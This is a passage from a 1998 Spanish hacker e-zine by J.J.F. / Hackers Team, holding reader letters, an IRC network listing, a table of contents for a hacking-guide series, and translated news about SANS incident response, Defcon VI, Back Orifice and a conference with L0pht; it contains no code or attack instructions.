- con el "virus" (o lo que sea).
-
- si vosotros no podeis ayudarme y publicais esto en el e-zine poned esta
- direccion de correo para que me contesten (si alguien sabe la respuesta
- claro) la dire es: zed@mixmail.com
-
- bueno,no os aburro mas un saludo
-
- \\'//
- (o -)
- -ooO--(_)--Ooo-
- --..--ZeD--..--
- http://www.angelfire.com/ak/HACKZED/ZED2.html
- http://come.to/HaCkS-wEb-RiNg
- !visitalasí
- !!EL DIA 3/9/98 TODOS A LA HUELGAíí
-
- <------>
-
- [ Es la primera vez que oigo semejante historia, si esto es un virus lo
- desconozco pero huele mas al tipico programa bromista de win95, has
- mirado en Inicio o en el registro, en busca de algo sospechoso. ?
- Si algun lector reconoce estos sintomas pues que nos escriba. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 30 Aug 1998 16:58:52 GMT
- From: Muerte <necrolibro@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Red IRC Union Latina
-
- NecroSaludos,
-
- Pueeee... no habia descubierto su e-zine hasta hace poco, y ke esta
- muuu bien y es muu interesante. A parte, me gustaria incluir un link a
- su pagina, pues eso dense una vuelta por la web de abajo del tooo (si la
- de Necronomicon...) y se meten en la Guia de Temas Olvidados y luego en
- Añadir un Enlace y rellenan el formulario, pa meterles un enlace dentro
- de la seccion Red. Ke porke no se lo meto yo... pues porke no se ke
- descripcion meterles, y como ya hice con SET les escribe un e-mail y les
- dije ke me dijesen una descripcion, y luego yo la meto...
-
- A parte de esto... pasando al tema ke me ocupa. Seguro ke ustedes
- conocen mazo de redes de IRC, pero Hispanas, pueee seguro ke conocen el
- IRC-Hispano, ┐pero y a parte de esa?, ninguna tal vez, pues yo les
- escribo esto pa decirles ke hay una alternativa al IRC-Hispano y se
- llama... Union Latina, sus servers son los siguientes:
-
- Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org
- Union Latina: Digital (ES, Madrid): madrid.unionlatina.org
- Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org
- Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org
- Union Latina: Lander (ES, Madrid): lander.unionlatina.org
- Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org
- Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org
-
- Su pagina web oficial es:
-
- http://www.unionlatina.org
-
- Su bot es KaOs, y no tiene nada ke ver con el amigo Scytale. Pues pa ke
- les interesa esto, seguro ke hay mazo de gente, como yo, ke somos
- usuarios de proveedores de bancos y ke tenemos la entrada prohibida
- (G-Line) al IRC-Hispano o ke estamos hasta los gⁿevos de tanto
- IRC-Hispano... Pues ya tienen una alternativa real. Seguro ke si se dan
- una vuelta les convence...
-
- Pues nada solo keria ke dieran a conocer esta info en su e-zine, si pa
- ke la gente sepa ke hay una alternativa a la Red IRC-Hispano. Y ke esta
- muy bien esa alternativa se llama Union Latina y sus IRCops son muuu
- majos.
-
- Pues naaa maxx... si puedo ayudarles en algo diganmelo.. y sigan asi y
- pa mas arriba...
-
- Mushas gracias por tooo y sigan asi...
-
- Un Saludo de Muerte (Director del Necronomicon)
-
- NECRONOMICON (El Libro de los Muertos)
- http://members.xoom.com/necrolibro
-
- EN EL IRC:
-
- Nick: |Muerte
- Lugar: #necronomicon en Union Latina
- Todos los sabados y domingos sobre las 16:00
-
- <------>
-
- [ Thx pero nosotros ya conociamos la existencia de esta red de IRC en
- España junto con la de Hispanos y otras academicas.
- Pero para el que no lo sepa ya no tiene excusa :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ------------------------
- - NOTICIAS UNDERGROUND -
- ------------------------
-
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
- INDICE DE LAS NUEVAS Guide to (mostly) Harmless Hacking
-
- # Vol. 5 Programmers' Series
-
- No. 2: Shell Programming: an Exploit Explained, Part 1
-
-
- # Vol. 5 Programmers' Series
-
- No. 2: Shell Programming: an Exploit Explained, part 2
-
-
- # Vol. 5 Programmers' Series
-
- No. 3: More on Advanced Unix Shell Programming
-
-
- # Microsoft-only version Number 1
-
- Getting Serious with Win95
-
-
- # Microsoft-only version Number 2
-
- Hacking with Win95/NT: Batch File Programming
-
-
- # Microsoft-only version Number 3
-
- Hacking with Win95/NT: How to Telnet
-
- How to Break into a Windows 95 Computers from the Internet
-
-
- # Vol. 3 No. 7, Part 1
-
- Introduction to Computer Viruses
-
-
- # Vol. 3 No. 7, part 2
-
- Introduction to Computer Viruses
-
-
- # Vol. 6 Real Hackers
-
- No. 2: Harold Willison
-
-
- # Vol. 3 No. 8, Part 1
-
- The Magical Mystical Crypto-Primer
-
-
- # Vol. 3 No. 8, Part 2
-
- The Magical Mystical Crypto-Primer
-
- <────────────────────────────────────────────────────────────────────────────>
- ¿ QUIEN SE QUIERE PROTEGER DE LOS HACKERS ? EL GRUPO SHADOW LO SABE.
-
- OTC 7/23/98 8:25 AM
-
- WASHINGTON, D.C., U.S.A., 1998 JUL 23 (Newsbytes) --
-
- By Shawn P. McCarthy, Government Computer News.
-
- Los Hackers han ayudado a romper las redes del gobierno. Ellos
- comparten sus recursos y tecnicas en determinadas listas de correo y en
- areas de chat encriptadas. Los adminstradores de seguridad del Gobierno
- Americano estan formando grupos similares para combatir de una forma mas
- eficaz a los intrusos.
-
- Un pequeño grupo de experto en seguridad del gobierno han estado
- usando este metodo con el sector opuesto de la industria. El intercambio
- a servido para formar un concenso, no del todo aceptado, sobre que hacer
- cuando una red privada a sido penetrada por un intruso via Internet.
-
- El grupo Shadow incluye representantes de diferentes departamentos
- de defensa, Laboratorio Nacional de los Alamos. Los representantes
- corporativos provienen desde General Dynamics Corp hasta Disney Online.
-
- Dos grandes esfuerzos han sido obtenidos en este proceso. El primero
- es un libro: Computer Security Handling Step by Step. Publicado por Sans
- Institute of Bethesda, Md., disponible en http://www.sans.org, el libro
- cuesta $27 y discute como combatir a un intruso, ataques denial of
- service, cyberladrones y otros temas de seguridad.
-
- El libro cita seis estados de responsabilidad: preparacion, deteccion,
- contencion, eradicacion, recuperacion y seguimiento. Pero se enfoca mas en
- la parte de preparacion. Hace hincapie otra vez en proteger la red antes
- de que sea atacada.
-
- El grupo Shadow encontro que un buen lugar para empezar es justificar
- un gasto para invertir en una infraestuctura de seguridad. Tambien encontro
- que muchos sitios no tienen una solida politica de seguridad o incluso una
- filosofia en vez, que relentiza y complica las cosas cuando los incidentes
- ocurren.
-
- "Cada uno debe escoger la filosofia que ahi que seguir y conseguir
- presupuesto," dice Northcutt, antes de formular un plan de responsabilidad.
- Y el grupo aprendio que todos necesitan entrenamiento en el area de
- seguridad.
-
- El grupo decidio que lo que funciona con organizaciones grandes no
- siempre funciona con las pequeñas. Grupos grandes han dedicado personal
- para contener los incidentes. Las pequeñas generalmente emplean a un solo
- miembro cuando ahi indicios de penetracion.
-
- Un inadecuado administrador de red, por exemplo, puede estar usando
- una cuenta privilegiada que el administrador nunca haya usado antes. Eso
- le daria pistas al intruso de que ha sido descubierto, por lo que el
- intruso podria destruir las evidencias y causar otro tipo de daños.
-
- Las discusiones del grupo Shadow revelan los puntos de los ataques
- Hackers. Los miembros coinciden en las maneras de como combatir contra
- codigo malicioso (usando antivirus, scanners para paquetes inexplicables
- enviados automaticamente desde tu red hacia Internet).
-
- Ellos tambien coinciden en realizar pruebas y network mapping
- (probando uno mismo puede aprender muchisimo sobre el funcionamiento de su
- red). Ellos tambien discuten sobre denial of service (estableciendo una
- facilidad de backup), organizaciones de espionaje (seguir el trafico,
- incluso falsificar informacion para despitar al intruso), hoaxes (mantener
- a los empleados informados, por ejemplo en http://ciac.llnl.gov), y
- acceso no autorizados (restringir las conexiones IP permitidas).
-
- Sorprendentemente, Northcutt dijo que el no esta muy concenciado de
- ataques con script∩s en algunos sitios.
-
- "La busqueda de informacion es la mejor forma de concerciarme" dice
- el. "En varios casos, hemos notado varios intentos de ataques, que indicaban
- que el intruso conocia la estructura de nuestro sistema."
-
- Los departamentos del DOD acuden rapidamente a sus equipos de
- respuesta ante incidentes informaticos para recibir ayuda inmediata. Un
- ejemplo de esto, esta en http://www.assist.mil
-
- El segundo resultado que concluyo el grupo Shadow se llama
- Cooperative Intrusion Detection Evaluation and Response project o tambien
- conocido como CIDER. Tambien un projecto del Instituto Sans, con la
- cooperacion de la Marina, con el fin de ayudar a las organizaciones a
- construir defensas propias.
-
- El CIDER se concentra en dos tecnicas. La primera es el TCPdump, un
- programa que monotoriza y filtra la actividad TCP a base de unas reglas
- cuando aparece un problema. La segunda es Network Flight Recorder, un
- conjunto de herramientas todavia en desarrollo para monotorizar, archivar y
- alertar a las autoridades.
-
- Los detalles del CIDER estan disponibles en
- http://www.nswc.navy.mil/ISSEC/CID/ . Cuando lo visitas, se puede bajar
- una copia shareware. Pero a causa de la cantidad de log's que genera, es
- recomendable añadir mas cantidad de disco duro para que funcione
- correctamente. La herramienta viene con una buena documentacion.
-
- Finalmente, lleva en mente que no en todos los casos de recuperacion
- resultan ataques de hackers. Casos externos tambien incluyen desastres
- naturales, descuidos y fallos en los equipos. Teniendo un plan de
- responsabilidad y un plan de recuperacion es el primer paso para controlar
- la perdida de servicio.
-
- Para una lista de herramientas de seguridad, visitar
- http://www.perl.com/latro
-
- Para monotorizar un grupo de UseNet que discute sobre temas de
- seguridad, comprobar las comp.sys.www.security o comp.infosystems.www.cgi
-
- Ver The Best of Security en best-of-security@requestcyber.com.au o
- en los diferentes equipos del CERT, cert-advisory-request@cert.org
-
- Shawn P. McCarthy es un periodista informatico, webmaster y
- programador de Internet para Cahners Business Information Inc.
-
- Reported by Government Computer News: http://www.gcn.com
-
- <────────────────────────────────────────────────────────────────────────────>
- LA LUCHA POR LA HABILIDAD AUMENTA.
-
- 12Aug98 USA: RANDOM NEWSBYTES -
-
- By Tony Waltham
-
- La semana pasada los hackers se reunieron en las vegas en una
- conferencia conocida como Defcon VI, pero por lo general el evento no tiene
- mucha publicidad excepto en esta ocasion que a sido de principal noticia en
- CNN, ZDNet y la revista Wired cuando un grupo de hackers que se
- autodenominan "the Cult of the Dead Cow" anuncio una nueva potente
- herramienta que permite el acceso remoto a maquinas Windows 95 o 98.
-
- Esta utilidad autocontenida y que se instala por si misma permite
- a sus usuarios controlar y monotorizar ordenadores que corren el sistema
- operativo Windows en una red. Y este software puede ser obtenido de forma
- gratuita en Internet.
-
- Conocida como Back Orifice, ironicamente parecido al BackOffice de
- Microsoft, principalmente provee unas potentes capacidades para el hacking
- que pueden ser usadas contra cualquier ordenador con la plataforma Windows.
-
- Microsoft respondio de inmediato restando importancia en las
- capacidades de Back Orifice, mientras que un experto en seguridad de
- Microsoft dijo que el programa no representa un gran problema a los
- usuarios finales de Windows. Back Orifice es solo otra herramienta que un
- administrador puede instalar en una red para monotorizar esta... para
- examinar el sistema, explico.
-
- Por otro lado, la revista Wired indica que esta postura es demasiado
- blanda, y publico un analisis de un consultor independiente de seguridad
- llamado Weld Pond, del grupo L0Pht Heavy Industries con sede en Boston (la
- cual es una organizacion hacker) que contradice la opinion de Microsoft.
-
- Diciendo: "Se puede controlar el sistema de ficheros y tambien el
- registro - es realmente sencillo... (usa) un interface de web...
- Se puede subir cualquier fichero en el sistema o bajar cualquier fichero
- desde cualquier sitio en Internet."
-
- Lo que esta herramienta pone de manifiesto es el alto riesgo que
- demuestran ser las redes de ordenadores y sus estandar para los hackers.
- Desafortunadamente, al ser una herramienta tal facil provocara un
- crecimiento en entradas ajenas a los ordenadores, en vez de estimular una
- mayor vigilancia en los usuarios, provocando una mayor vulnerabilidad en las
- redes informaticas.
-
- La Defcon VI atrajo a unos 1.000 hackers (ademas de would-b hackers),
- pero su numero aumenta por el mundo entero.
-
- Consultores expertos en seguridad han dicho que ahora existen unos
- 50.000 hackers, mientras que algunos estiman mas incluso, especialmente si
- se consideran los wannabees.
-
- Otro experto, Charles Palmer, el cabezilla del grupo de IBM "ethical
- hackers" miro el problema de forma diferente, y reconocio que existen unos
- 100 hackers realmente peligrosos por el mundo hoy en dia.
-
- Una de las actividades de este grupo es extraer pruebas de los
- sistemas que han sido invadidos, buscar evidencias forenses como por ejemplo
- fragmentos de codigo en las herramientas usadas, pero dejadas escondidas en
- el sistema.
-
- Hoy, el anonimato de la World Wide Web y la publicidad que los ataques
- generan - especialmente aquellos sistemas importantes en Internet que han
- sido hackeados - estimulan esta labor.
-
- ¿ Realmente es tan grave el problema del hacking ?
-
- Considerando esta estadistica : En un periodo de 12 meses se han
- registrado unos 250.000 intentos de entrada en los ordenadores de US Air
- Force, segun las noticias de ZDNet. Despues fueron robados en 1996 de una
- surcusal del Citibank unos 10 millones de dolares. Esto indica el serio
- peligro de los intrusos informaticos. Ninguna red puede considerarse inmune
- contra los intrusos, fuera de la compañia o dentro de ella, y aumentar la
- seguridad debe ser una de las principales tareas de una empresa. Al igual
- que el dinero es guardado en sitio seguro, los datos tambien lo deberian
- estar.
-
- E incluso los cerrojos y las llaves (palabras de paso) tiene que ser
- cambiados frecuentemente, mientras aquellos encargados de uan red de
- ordenadores tienen que estar alerta de los avisos de seguridad que van
- apareciendo que conciernen a los diferentes sistemas operativos o las
- aplicaciones asi como las nuevas fallos que se van descubriendo y publicados
- casi diariamente.
-
- Los expertos en seguridad constantemente avisan que nunca es
- suficiente concenciarse sobre la importancia de la seguridad y sobre los
- aparentes sistemas informaticos detras de un cortafuegos, etc. pueden ser
- facilmente comprometidos por un experto hacker o un espia industrial.
-
- Recientemente tuve una charla con un experto en seguridad de la
- empresa Sun Microsystems quien me explico que en Sun existe una regla
- fundamental: Si alquien pone un modem en la red de la corporacion sera
- gravemente penalizado.
-
- (Esto puede ser un punto vulnerable de una red. Un empleado quien
- necesita llamar a Internet a lo mejor conecta un modem en la red de su
- desktop - y no cuenta nada al encargado porque existe una estricta politica
- en este aspecto y ademas estan demasiados ocupados para ayudar.)
-
- Los Hackers generalmente no actuan con intenciones criminales, pero
- en algunos casos como el de Citibank ilustra que una cosa puede llevar a la
- otra.
-
- Aqui, la experencia de conseguir acceso y controlar sistemas
- informaticos de bancos fue desarrollado por un grupo de Hackers rusos que
- estaban interesados en obtener ventajas economicas. La etica Hacker para
- estos intrusos fue como exploracion y no para robar.
-
- Por otro lado, drogado y depresivo, uno de los Hackers vendio los
- secretos por $100 y 2 botellas de vodka, permitiendo que las organizaciones
- criminales pudiesen robar 10 millones de dolares.
-
- El tema de hacking nunca desaparecera, y por el momento casi nunca es
- inocente - pero si destructivo - muchos de ellos se interesan en poder
- saltarse las barreras de los sistemas informaticos, en algunos casos puede
- costar caro cuando los datos han sido accidentalmente borrados o
- comprometidos.
-
- Es el juego del gato y el raton, reflejando un lado perveso en la
- naturaleza del hombre (como los virus informaticos, que son destructivos
- o benignos.)
-
- Pero es una larga carrera, como el coste del fraude con tarjetas
- de credito, cualquiera puede ser el que tenga que pagar a un experto en
- seguridad para examinar el daño que su sistema a sufrido por la actividad
- hacking.
-
- Por supuesto prevenirse es la mejor cura. Es mejor minimizar el coste
- de una actividad hacking manteniendo a un experto en seguridad o un
- consultor y poder mantener un buen nivel de productividad.
-
- Es tambien critico mantener al dia los riesgos, los peligros y las
- apropiadas acciones a seguir en caso de riesgo en esta lucha por la
- habilidad.
-
- Tony Waltham es el editor de Database.
-
- BANGKOK POST 12/08/98 P7
-
- <────────────────────────────────────────────────────────────────────────────>
- EL NT EN EL PUNTO DE MIRA DE LOS HACKERS.
-
- 13Aug98 USA.
-
- Los Hackers que han distribuido un programa para controlar
- remotamente el Windows 95 y 98 han avisado que pueden sacar una version
- para el Windows NT, escribe Steve Ranger.
-
- El grupo americano the Cult of the Dead Cow (cDc) la semana pasada
- distribuyo el Back Orifice, una herramienta que permite tomar el control
- desde un PC a otro PC sin el conocimiento del usuario.
-
- El cDc dice que el Back Orifice a sido bajado del web durante los
- cuatro primeros dias desde que fue puesta unas 35.000 veces.
-
- Una version que permite a los Hackers controlar una maquina basada en
- Windows desde Unix a sido distribuida, y el cDc dice que esta trabajando en
- una version que permita controlar remotamente el NT.
-
- Microsoft alega que los usuarios que usen procedimientos de seguridad,
- como servidores proxy, cortafuegos y no bajan ningun tipo de codigo desde
- sitios desconocidos deberian estar a salvo de esta herramienta.
-
- El cDc desmienta esto. 'Existen varias maneras de que el programa
- corra en un ordenador Windows, no solo sin la aprobacion del usuario, pero
- si sin el conocimiento del usuario,' dice el portavoz del cDc.
-
- Paul Ducklin, cabezilla del grupo de anti-virus Sophos, dice que el
- Back Orifice 'es un programa que hace lo que dice - control remoto en un
- Windows 95'.
-
- El Back Orifice da la oportunidada a los Hackers de controlar casi
- todas las partes del sistema incluyendo el registro, el sistema de ficheros
- y la teclas pulsadas. La herramienta de administracion remota tambien puede
- ser usada legitimamente para soporte tecnico remoto o administracion remota
- de una red.
-
- COMPUTING 13/08/98 P2
-
- <────────────────────────────────────────────────────────────────────────────>
- - J.J.F. / HACKERS TEAM - ESTUVO CON L0PHT EN MIT.
-
- El dia 16/9 - J.J.F. / HACKERS TEAM - asistio a una conferencia
- referente al mundo de los Hackers. Esta conferencia fue patronicada por la
- AIP (Association of Internet Professionals, Boston, Massachusetts Chapter.),
- en la cual se invito a varios conferenciantes, la jefa encargada de los
- delitos informaticos de FBI de Massachusetts, 2 agentes de esta division,
- un experto en seguridad y a el Dr. Mudge del grupo L0pth, conocido grupo
- de hackers residentes en Boston.
-
- La conferencia fue muy divertida, ya que los de L0pth no siente
- demasiado afecto al FBI por lo que se pudo oir, ya que durante la
- conferencia Mudge aprovecho para burlarse de los agentes del FBI, ademas
- quedaron realmente mal cuando los propios agente del FBI no eran capazes de
- responder a varias preguntas de Mudge y de los propios oyentes, unicamente
- contestaban con evasivas :)
-
- Como anecdota decir que los de L0pth ivan con sus camisetas oficiales
- y nosotros, ivamos con las nuestras tambien pero ademas con la gorras
- tambien, provocando que cuando entramos en la sala todo la gente se quedo
- boquiabiertos y los de L0pth se comenzaron al reir cuando vieron otro
- grupo Hacker entra en la sala.
-
- Desde aqui mandamos un saludo a la gente de L0pth, por ser tan
- agradables con nosotros y en especial a Dr. Mudge. Para mas informacion
- sobre la conferencia os remito a los siguientes url's:
-
- http://www.l0pht.com/index.html
- http://boston.us.association.org/
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- Pues aqui acaba este magnifico numero o eso pensamos, pero por
- supuesto que el proximo intentaremos que sea mejor :) pero logicamente
- necesitamos vuestra colaboracion.
-
- Como ya hemos dicho varias veces en este ezine puede escribir quien
- quiera, da igual si eres policia, administrador, etc. para eso estamos
- nosotros para expandir vuestras opiniones. Aqui publicamos H/C/P/V,
- seguridad, cursillos, de todo un poco :)
-
- A ver si para el siguiente numero os damos varias sorpresas que
- seguro que seran noticia por todos lados, ya que - J.J.F. / HACKERS TEAM -
- se lanza a la carga. Bueno, se acabo lo que se daba y una feliz vuelta a
- clase a todos nuestros lectores. Pues eso, escribe a:
-
- jjf_team@usa.net
-
- ADIOS Y HASTA EL SIGUIENTE NUMERO!!!
- - J.J.F. / HACKERS TEAM -
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-